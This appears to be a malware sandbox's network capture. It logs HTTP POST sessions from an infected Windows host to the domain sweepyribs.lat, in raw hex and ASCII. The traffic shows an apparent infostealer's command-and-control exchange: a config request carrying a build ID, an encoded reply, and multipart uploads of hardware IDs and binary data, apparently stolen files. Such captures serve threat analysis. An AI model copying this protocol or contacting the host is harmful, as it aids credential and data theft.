2024-12-17 05:04:14 UTC	1048	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 05:04:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=u5a5ohl805u2evbbeeij6h365j; expires=Fri, 11-Apr-2025 22:50:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wPuesGuPgbXkeMW64VcIj%2FTaL9lGleOc1MvqSiasRlFVokdzVuBA7sykF5McRHhXSnAg2bKoLJEg%2BOP2%2ByEzZoGljv%2Bc9eulrycneIG75NtH8PcYRwSqvXnhKDRWMQa%2BXQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f345eff9c464346-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1703&min_rtt=1696&rtt_var=651&sent=352&recv=624&lost=0&retrans=0&sent_bytes=2832&recv_bytes=598658&delivery_rate=1662870&cwnd=252&unsent_bytes=0&cid=4db6c6db874e486e&ts=2279&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.5	50004	104.21.2.110	443

Timestamp	Bytes transferred	Direction	Data
2024-12-17 05:04:14 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 47 Host: sweepyribs.lat
2024-12-17 05:04:14 UTC	47	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
2024-12-17 05:04:15 UTC	1034	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 05:04:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=njnlnc59r1l31p3gvhf79qrj26; expires=Fri, 11-Apr-2025 22:50:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pYW0gZUUQvFrZudjw1IOhTvXZ0jqFc1wdbcINbOHG86R5mCxB3OGKRYmIaH5V8iTKiSQNxUXbDqSPyYLjl2NDZPw44WP96l8ur8aKQ4vmZW%2Boc3mC5oCeaWS9zTrO%2FeTmQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f345f0ded5b8ccc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1784&min_rtt=1777&rtt_var=682&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=945&delivery_rate=1586956&cwnd=203&unsent_bytes=0&cid=57dba623412b617f&ts=747&x=0"
2024-12-17 05:04:15 UTC	335	IN	Data Raw: 31 64 32 64 0d 0a 71 4b 6b 66 76 41 79 48 6d 4e 47 2b 5a 52 75 42 65 46 36 51 4e 54 69 46 6c 4d 6d 2f 79 32 50 56 6e 37 66 56 37 4f 51 72 59 54 66 54 69 32 6d 65 4e 72 4f 30 38 38 30 41 4f 62 73 4d 4c 4f 56 51 46 4b 66 31 72 5a 33 78 42 62 54 7a 78 4c 44 41 78 6c 30 4d 46 5a 4c 50 66 74 42 2f 34 72 54 7a 32 78 30 35 75 79 4d 6c 73 6c 42 57 70 36 37 72 32 71 45 42 74 50 50 56 74 49 65 4c 57 77 31 55 77 4d 56 34 31 47 6e 6b 2f 4c 44 53 43 48 37 6b 48 54 2f 36 57 31 48 6f 2f 4b 53 64 35 30 47 77 35 5a 58 76 7a 71 6c 4f 46 56 62 6c 79 47 7a 58 4c 76 71 30 71 70 77 41 64 61 4e 43 66 50 46 51 57 75 6e 79 72 64 53 6a 43 37 33 37 31 4c 47 47 6c 45 49 48 58 38 44 4c 65 39 56 6a 37 65 69 39 32 41 39 31 34 68 63 2f 73 68 6b 61 34 4f 37 72 68 65 6c 53 68 66 37 45 70 Data Ascii: 1d2dqKkfvAyHmNG+ZRuBeF6QNTiFlMm/y2PVn7fV7OQrYTfTi2meNrO0880AObsMLOVQFKf1rZ3xBbTzxLDAxl0MFZLPftB/4rTz2x05uyMlslBWp67r2qEBtPPVtIeLWw1UwMV41Gnk/LDSCH7kHT/6W1Ho/KSd50Gw5ZXvzqlOFVblyGzXLvq0qpwAdaNCfPFQWunyrdSjC7371LGGlEIHX8DLe9Vj7ei92A914hc/shka4O7rhelShf7Ep
2024-12-17 05:04:15 UTC	1369	IN	Data Raw: 4b 61 39 79 76 6d 58 78 6b 34 50 46 5a 4b 4c 65 39 42 76 36 50 71 68 31 41 78 79 35 67 67 33 2b 31 70 58 35 2f 75 68 30 71 6f 42 73 50 66 66 75 49 53 43 52 41 35 54 79 73 73 39 6b 43 37 69 34 76 4f 45 52 31 72 6d 43 6a 76 2b 51 52 6a 64 74 72 53 54 73 45 47 77 38 5a 58 76 7a 6f 35 4d 41 46 62 42 78 48 37 57 5a 66 66 36 6f 64 6f 4b 66 50 45 63 4f 66 78 64 57 66 58 38 70 64 75 71 43 4c 7a 30 30 4c 43 4b 78 67 64 44 55 74 4b 4c 4a 5a 35 50 36 50 47 2f 31 68 42 35 6f 77 56 79 36 78 64 64 36 37 62 7a 6e 61 30 41 73 2f 7a 52 75 59 43 43 52 51 56 62 78 38 52 37 31 47 37 69 38 4c 76 55 42 6e 54 6f 46 54 7a 33 57 6c 37 68 2b 71 72 59 36 55 2f 33 2b 73 33 33 31 73 5a 6e 42 46 62 59 69 55 6a 64 59 4f 76 39 70 5a 77 59 4e 2f 70 61 4f 2f 34 58 41 71 66 34 72 74 4b 37 Data Ascii: Ka9yvmXxk4PFZKLe9Bv6Pqh1Axy5gg3+1pX5/uh0qoBsPffuISCRA5Tyss9kC7i4vOER1rmCjv+QRjdtrSTsEGw8ZXvzo5MAFbBxH7WZff6odoKfPEcOfxdWfX8pduqCLz00LCKxgdDUtKLJZ5P6PG/1hB5owVy6xdd67bzna0As/zRuYCCRQVbx8R71G7i8LvUBnToFTz3Wl7h+qrY6U/3+s331sZnBFbYiUjdYOv9pZwYN/paO/4XAqf4rtK7
2024-12-17 05:04:15 UTC	1369	IN	Data Raw: 4b 76 7a 74 34 4a 4d 6b 4c 42 69 55 6a 64 59 4f 76 39 70 5a 77 59 4e 2f 70 61 4f 2f 34 58 41 71 66 37 6f 39 69 73 44 72 62 33 32 37 4b 45 69 6b 45 4e 56 74 6a 45 65 64 35 69 37 66 43 2b 30 67 4e 78 36 68 45 33 39 46 64 62 37 62 62 6c 6e 61 34 5a 39 36 57 56 67 34 6d 4b 52 41 77 58 2f 38 68 7a 30 47 6e 7a 75 71 79 53 48 6a 6e 6b 46 6e 79 71 46 31 62 75 39 71 44 58 72 51 47 77 38 4e 43 30 69 59 56 45 42 46 2f 45 7a 48 6e 53 5a 2b 6a 38 73 39 73 44 66 50 45 66 4e 66 35 62 47 71 6d 32 72 4d 58 70 57 66 66 53 30 71 47 4e 71 55 6f 53 58 49 72 55 4d 38 63 75 34 76 62 7a 68 45 64 2b 35 68 49 33 39 46 39 61 39 66 4f 6c 31 71 67 4c 73 66 7a 59 75 34 69 47 53 41 4e 54 78 73 74 36 32 58 7a 33 2f 37 58 4f 44 54 6d 74 57 6a 76 71 46 77 4b 6e 77 4c 76 4b 75 42 66 31 79 Data Ascii: Kvzt4JMkLBiUjdYOv9pZwYN/paO/4XAqf7o9isDrb327KEikENVtjEed5i7fC+0gNx6hE39Fdb7bblna4Z96WVg4mKRAwX/8hz0GnzuqySHjnkFnyqF1bu9qDXrQGw8NC0iYVEBF/EzHnSZ+j8s9sDfPEfNf5bGqm2rMXpWffS0qGNqUoSXIrUM8cu4vbzhEd+5hI39F9a9fOl1qgLsfzYu4iGSANTxst62Xz3/7XODTmtWjvqFwKnwLvKuBf1y
2024-12-17 05:04:15 UTC	1369	IN	Data Raw: 4f 52 67 78 52 78 4d 31 37 30 32 76 71 38 4b 48 55 43 58 54 6f 46 54 66 67 56 31 66 6a 2b 71 2f 56 6f 67 76 33 73 35 57 77 6c 73 59 52 51 32 44 48 78 48 33 64 65 4b 58 6c 2f 63 56 48 66 75 39 61 5a 4c 4a 62 56 4f 66 35 70 39 47 69 43 62 62 78 32 37 43 4c 6a 30 45 4c 52 38 76 50 64 64 39 67 36 76 75 33 32 51 4a 39 35 42 34 36 2f 52 63 55 70 2f 47 7a 6e 66 46 42 6d 4e 72 67 39 61 2b 38 43 52 77 62 30 34 74 36 30 69 36 39 75 72 2f 66 43 33 48 73 48 44 58 2b 58 56 50 73 2b 71 44 5a 70 51 69 79 2b 39 53 79 69 34 64 4e 44 31 2f 4d 79 48 37 52 59 65 72 79 38 35 4a 48 66 76 74 61 5a 4c 4a 79 54 65 7a 34 72 5a 32 32 54 36 36 39 30 72 76 4f 33 67 6b 50 58 4d 7a 4e 65 4e 4a 76 34 2f 4b 32 31 41 4e 34 35 52 77 2f 2f 56 4e 66 35 76 6d 76 30 61 63 4c 74 76 7a 5a 76 49 Data Ascii: ORgxRxM1702vq8KHUCXToFTfgV1fj+q/Vogv3s5WwlsYRQ2DHxH3deKXl/cVHfu9aZLJbVOf5p9GiCbbx27CLj0ELR8vPdd9g6vu32QJ95B46/RcUp/GznfFBmNrg9a+8CRwb04t60i69ur/fC3HsHDX+XVPs+qDZpQiy+9Syi4dND1/MyH7RYery85JHfvtaZLJyTez4rZ22T6690rvO3gkPXMzNeNJv4/K21AN45Rw//VNf5vmv0acLtvzZvI
2024-12-17 05:04:15 UTC	1369	IN	Data Raw: 55 63 33 48 65 39 46 6f 35 50 2b 35 30 41 42 38 36 42 55 77 73 68 6b 61 34 4f 37 72 68 65 6b 76 76 4f 37 43 74 49 43 4e 58 78 67 56 31 59 56 6b 6e 6d 6e 70 75 75 75 63 42 48 4c 6f 48 6a 7a 2b 56 31 37 71 39 72 6e 53 72 67 61 2b 39 73 65 39 69 59 46 43 43 31 37 46 7a 57 2f 53 59 50 66 2f 6f 63 35 48 4e 36 4d 64 4a 4c 49 50 47 74 48 78 75 38 32 71 51 34 62 72 31 71 47 46 69 30 56 44 53 6f 54 53 50 64 6c 69 70 61 4c 7a 32 67 68 77 34 42 55 39 2b 31 74 58 34 76 2b 75 33 4b 38 46 76 66 66 56 73 59 69 48 54 41 6c 57 79 38 46 30 32 57 62 69 2b 61 47 63 53 54 6e 6b 41 6e 79 71 46 33 50 67 35 4b 58 4e 36 52 37 35 35 4a 57 77 67 73 59 52 51 31 48 41 78 48 6e 5a 59 75 50 2f 74 64 45 47 64 75 49 61 4d 2f 5a 63 55 2b 48 33 70 74 69 6b 42 61 58 33 33 72 69 43 6a 30 55 Data Ascii: Uc3He9Fo5P+50AB86BUwshka4O7rhekvvO7CtICNXxgV1YVknmnpuuucBHLoHjz+V17q9rnSrga+9se9iYFCC17FzW/SYPf/oc5HN6MdJLIPGtHxu82qQ4br1qGFi0VDSoTSPdlipaLz2ghw4BU9+1tX4v+u3K8FvffVsYiHTAlWy8F02Wbi+aGcSTnkAnyqF3Pg5KXN6R755JWwgsYRQ1HAxHnZYuP/tdEGduIaM/ZcU+H3ptikBaX33riCj0U
2024-12-17 05:04:15 UTC	1369	IN	Data Raw: 58 44 64 59 65 62 6f 73 74 6f 56 65 65 34 51 4c 76 68 63 58 2b 72 37 70 74 36 76 42 37 7a 78 78 37 36 4f 68 55 4a 44 47 34 72 4d 5a 5a 34 32 70 64 6d 6b 79 67 31 2b 37 77 77 33 38 31 52 4d 36 75 62 72 6b 2b 6b 51 73 4f 79 56 37 35 69 57 58 67 52 4b 68 4e 49 39 32 57 4b 6c 6f 76 50 61 44 6e 2f 6b 48 44 4c 67 55 6c 7a 6f 2b 61 4c 55 72 51 6d 30 2f 64 47 7a 69 59 4e 4b 44 31 37 4e 79 48 4c 61 5a 2b 76 7a 76 4a 78 4a 4f 65 51 43 66 4b 6f 58 65 2f 7a 31 70 39 44 70 48 76 6e 6b 6c 62 43 43 78 68 46 44 57 63 54 4f 66 64 52 6f 34 66 2b 31 31 67 4a 35 36 42 6b 7a 39 6c 46 65 36 50 61 67 31 4b 67 48 73 76 66 65 73 59 4f 46 54 77 55 56 68 49 74 36 78 69 36 39 75 70 50 48 43 6e 58 6b 57 69 4f 38 54 68 72 67 2b 75 75 46 36 51 71 37 2b 64 4b 33 67 34 56 42 42 6c 48 41 Data Ascii: XDdYebostoVee4QLvhcX+r7pt6vB7zxx76OhUJDG4rMZZ42pdmkyg1+7ww381RM6ubrk+kQsOyV75iWXgRKhNI92WKlovPaDn/kHDLgUlzo+aLUrQm0/dGziYNKD17NyHLaZ+vzvJxJOeQCfKoXe/z1p9DpHvnklbCCxhFDWcTOfdRo4f+11gJ56Bkz9lFe6Pag1KgHsvfesYOFTwUVhIt6xi69upPHCnXkWiO8Thrg+uuF6Qq7+dK3g4VBBlHA
2024-12-17 05:04:15 UTC	297	IN	Data Raw: 48 6d 36 37 71 63 53 54 6e 6b 44 48 79 71 46 32 53 6e 35 4b 6a 4e 71 67 36 6d 77 35 58 76 6c 37 67 4a 43 45 50 4e 32 33 37 49 5a 65 6a 32 6f 75 4a 48 49 62 64 49 62 71 41 46 43 50 69 32 74 4f 4c 6e 51 62 61 39 6a 59 36 58 78 6c 39 44 44 5a 69 46 50 63 77 75 76 62 72 30 33 78 56 72 35 52 6b 71 38 52 42 6b 32 64 47 39 31 36 34 52 73 4f 72 61 39 38 44 47 52 6b 4d 4e 38 34 74 30 32 58 58 30 37 4c 37 4d 41 44 6e 63 56 48 7a 71 46 77 4b 6e 77 36 6a 54 70 77 61 68 37 4a 69 51 6d 49 78 4f 45 31 4c 64 78 44 32 51 4c 75 4f 36 36 34 39 4a 4f 65 63 4c 66 4b 6f 48 43 4c 79 6a 2b 49 72 35 55 36 69 7a 7a 50 65 59 78 68 46 52 47 34 72 5a 50 59 59 75 6f 76 6d 68 7a 67 46 36 39 52 6c 37 7a 47 6c 39 2f 66 75 74 79 72 67 2f 69 66 72 50 75 6f 69 52 57 45 39 41 79 63 56 7a 32 Data Ascii: Hm67qcSTnkDHyqF2Sn5KjNqg6mw5Xvl7gJCEPN237IZej2ouJHIbdIbqAFCPi2tOLnQba9jY6Xxl9DDZiFPcwuvbr03xVr5Rkq8RBk2dG9164RsOra98DGRkMN84t02XX07L7MADncVHzqFwKnw6jTpwah7JiQmIxOE1LdxD2QLuO6649JOecLfKoHCLyj+Ir5U6izzPeYxhFRG4rZPYYuovmhzgF69Rl7zGl9/futyrg/ifrPuoiRWE9AycVz2
2024-12-17 05:04:15 UTC	1369	IN	Data Raw: 32 62 65 66 0d 0a 57 72 50 4c 71 75 36 74 5a 78 66 4b 61 31 61 4f 4f 4d 58 41 72 65 6b 38 49 6a 36 56 75 65 76 79 76 6d 58 78 6c 39 44 44 5a 69 46 50 63 77 75 76 62 72 30 33 78 56 72 35 52 6b 71 38 52 42 6b 32 64 69 73 32 36 77 47 70 37 2f 37 76 4a 71 42 43 55 30 56 78 59 73 6c 35 79 36 74 75 6f 79 53 52 32 47 6a 51 6e 7a 48 56 46 54 70 38 62 33 4d 35 43 2b 77 2b 39 43 77 6e 73 52 6e 43 45 48 4e 69 7a 4f 65 61 4b 57 69 34 35 4a 48 66 66 4a 61 5a 4b 49 46 41 62 4b 6c 2f 49 33 37 48 76 6e 6b 6c 61 48 4f 33 68 74 4e 46 64 69 4c 4a 5a 34 70 35 75 69 68 32 67 52 76 34 46 30 43 7a 46 52 4d 36 76 6d 67 33 4a 63 2f 6d 66 44 55 74 49 44 45 65 42 56 59 32 73 68 34 32 56 44 62 39 4c 54 49 41 48 66 6c 47 6e 79 38 46 31 57 6e 72 70 4b 64 34 55 47 49 73 35 57 76 7a 74 Data Ascii: 2befWrPLqu6tZxfKa1aOOMXArek8Ij6VuevyvmXxl9DDZiFPcwuvbr03xVr5Rkq8RBk2dis26wGp7/7vJqBCU0VxYsl5y6tuoySR2GjQnzHVFTp8b3M5C+w+9CwnsRnCEHNizOeaKWi45JHffJaZKIFAbKl/I37HvnklaHO3htNFdiLJZ4p5uih2gRv4F0CzFRM6vmg3Jc/mfDUtIDEeBVY2sh42VDb9LTIAHflGny8F1WnrpKd4UGIs5Wvzt
2024-12-17 05:04:15 UTC	1369	IN	Data Raw: 6d 70 6c 69 6b 48 65 6c 37 50 4f 45 56 54 65 6a 43 48 79 71 46 78 33 6b 35 4c 6e 62 71 68 65 30 75 75 75 4a 71 59 68 4f 41 6b 50 61 78 6e 48 2f 62 66 54 77 6a 65 49 53 65 75 30 55 4f 2b 52 47 47 71 6d 32 70 4a 33 78 4f 50 65 31 6c 59 6a 41 78 6c 46 44 44 59 72 2b 66 74 42 67 34 75 79 69 6b 53 42 33 35 42 73 71 34 6c 70 57 78 76 57 36 31 2b 6c 50 39 2f 75 56 37 39 7a 49 43 51 64 45 69 70 4d 74 6a 44 57 77 71 65 53 4d 56 57 61 74 41 33 7a 6b 46 77 4b 31 75 4f 76 50 36 56 6e 33 75 74 61 6c 6e 49 42 4b 46 56 61 4e 39 55 50 37 65 65 62 71 74 64 38 35 52 38 67 57 4f 76 56 4e 58 65 48 51 69 35 33 6e 51 62 69 39 6a 59 37 4f 7a 67 6b 38 47 34 72 54 50 59 59 75 30 50 6d 39 30 67 42 76 38 6c 63 5a 35 56 52 4b 34 66 58 72 6b 2b 6b 48 39 36 57 46 2b 63 36 43 57 45 4d Data Ascii: mplikHel7POEVTejCHyqFx3k5Lnbqhe0uuuJqYhOAkPaxnH/bfTwjeISeu0UO+RGGqm2pJ3xOPe1lYjAxlFDDYr+ftBg4uyikSB35Bsq4lpWxvW61+lP9/uV79zICQdEipMtjDWwqeSMVWatA3zkFwK1uOvP6Vn3utalnIBKFVaN9UP7eebqtd85R8gWOvVNXeHQi53nQbi9jY7Ozgk8G4rTPYYu0Pm90gBv8lcZ5VRK4fXrk+kH96WF+c6CWEM

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.5	50014	104.21.2.110	443

Timestamp	Bytes transferred	Direction	Data
2024-12-17 05:04:17 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=NH56WO0SVSIJ14IE User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12823 Host: sweepyribs.lat
2024-12-17 05:04:17 UTC	12823	OUT	Data Raw: 2d 2d 4e 48 35 36 57 4f 30 53 56 53 49 4a 31 34 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 43 33 32 34 41 37 32 38 42 38 32 34 32 44 32 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4e 48 35 36 57 4f 30 53 56 53 49 4a 31 34 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4e 48 35 36 57 4f 30 53 56 53 49 4a 31 34 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4e 48 Data Ascii: --NH56WO0SVSIJ14IEContent-Disposition: form-data; name="hwid"5C324A728B8242D2AC8923850305D13E--NH56WO0SVSIJ14IEContent-Disposition: form-data; name="pid"2--NH56WO0SVSIJ14IEContent-Disposition: form-data; name="lid"PsFKDg--pablo--NH
2024-12-17 05:04:18 UTC	1037	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 05:04:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mtj1um30mbfn8vnhvre3odjfhm; expires=Fri, 11-Apr-2025 22:50:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cnOFanxknJEFAk%2BBlzzZfKZGqTTH1ufD6uxCQOPY8QR0nfqiDMO6%2B3I99ZrD7tUMW3FbM0QczlZy8vfbfYEZdFT2hAycxuKsCP3GqeaDdHVRHv27vydp5JCnZfZirf1Xeg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f345f1e0b1c4223-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1638&min_rtt=1638&rtt_var=819&sent=12&recv=20&lost=0&retrans=1&sent_bytes=4206&recv_bytes=13759&delivery_rate=133662&cwnd=205&unsent_bytes=0&cid=5f1b123212c49205&ts=868&x=0"
2024-12-17 05:04:18 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-17 05:04:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.5	50035	104.21.2.110	443

Timestamp	Bytes transferred	Direction	Data
2024-12-17 05:04:19 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=KQFC11SHQXT4 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15041 Host: sweepyribs.lat
2024-12-17 05:04:19 UTC	15041	OUT	Data Raw: 2d 2d 4b 51 46 43 31 31 53 48 51 58 54 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 43 33 32 34 41 37 32 38 42 38 32 34 32 44 32 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4b 51 46 43 31 31 53 48 51 58 54 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4b 51 46 43 31 31 53 48 51 58 54 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4b 51 46 43 31 31 53 48 51 58 54 34 0d 0a Data Ascii: --KQFC11SHQXT4Content-Disposition: form-data; name="hwid"5C324A728B8242D2AC8923850305D13E--KQFC11SHQXT4Content-Disposition: form-data; name="pid"2--KQFC11SHQXT4Content-Disposition: form-data; name="lid"PsFKDg--pablo--KQFC11SHQXT4
2024-12-17 05:04:20 UTC	1052	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 05:04:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=oa1lerogpmgv7tklhcqevapvcu; expires=Fri, 11-Apr-2025 22:50:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fCs94tAZqjtGQFGY1L%2BK4bi%2BRsW3EakkQKVAo5zyQ%2FjMfVdwf7RtbPP%2F%2BC9Nv%2Bn0JvdgLL4w%2FBmVpW9Odm6Zw%2Be%2BfR3olsyVJIW6Th7KbnIkpKbNlo4pDE4r7w3VVvXlwQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f345f2be9b37c94-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1812&min_rtt=1768&rtt_var=751&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2834&recv_bytes=15973&delivery_rate=1377358&cwnd=240&unsent_bytes=0&cid=c958af7575f13a51&ts=859&x=0"
2024-12-17 05:04:20 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-17 05:04:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.5	50050	104.21.2.110	443

Timestamp	Bytes transferred	Direction	Data
2024-12-17 05:04:21 UTC	270	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=297VITUI User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20507 Host: sweepyribs.lat
2024-12-17 05:04:21 UTC	15331	OUT	Data Raw: 2d 2d 32 39 37 56 49 54 55 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 43 33 32 34 41 37 32 38 42 38 32 34 32 44 32 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 32 39 37 56 49 54 55 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 32 39 37 56 49 54 55 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 32 39 37 56 49 54 55 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 Data Ascii: --297VITUIContent-Disposition: form-data; name="hwid"5C324A728B8242D2AC8923850305D13E--297VITUIContent-Disposition: form-data; name="pid"3--297VITUIContent-Disposition: form-data; name="lid"PsFKDg--pablo--297VITUIContent-Disposit
2024-12-17 05:04:21 UTC	5176	OUT	Data Raw: 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d 1b 88 82 b9 75 3f 0d 00 Data Ascii: un 4F([:7s~X`nO`i`u?
